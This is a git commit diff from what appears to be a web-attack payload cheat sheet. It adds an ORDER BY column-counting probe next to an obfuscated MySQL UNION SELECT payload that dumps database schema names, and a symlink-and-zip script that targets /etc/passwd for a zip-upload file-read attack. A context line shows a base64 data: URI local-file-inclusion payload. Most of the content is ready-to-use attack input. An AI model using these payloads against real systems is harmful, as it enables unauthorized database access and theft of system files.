Symbolic Link Zip + SQL injection ORDER BY
parent
a1fbd41bbb
commit
6070ece522
|
@ -51,4 +51,5 @@ http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbm
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
|
* [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
|
||||||
|
* [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
|
||||||
|
|
|
@ -1,5 +1,15 @@
|
||||||
# MYSQL Injection
|
# MYSQL Injection
|
||||||
|
|
||||||
|
##Detect columns number
|
||||||
|
Using a simple ORDER
|
||||||
|
```
|
||||||
|
order by 1
|
||||||
|
order by 2
|
||||||
|
order by 3
|
||||||
|
...
|
||||||
|
order by XXX
|
||||||
|
```
|
||||||
|
|
||||||
##MySQL Union Based
|
##MySQL Union Based
|
||||||
```
|
```
|
||||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||||||
|
|
Binary file not shown.
|
@ -0,0 +1,2 @@
|
||||||
|
ln -s /etc/passwd link
|
||||||
|
zip --symlinks test.zip link
|
Loading…
Reference in New Issue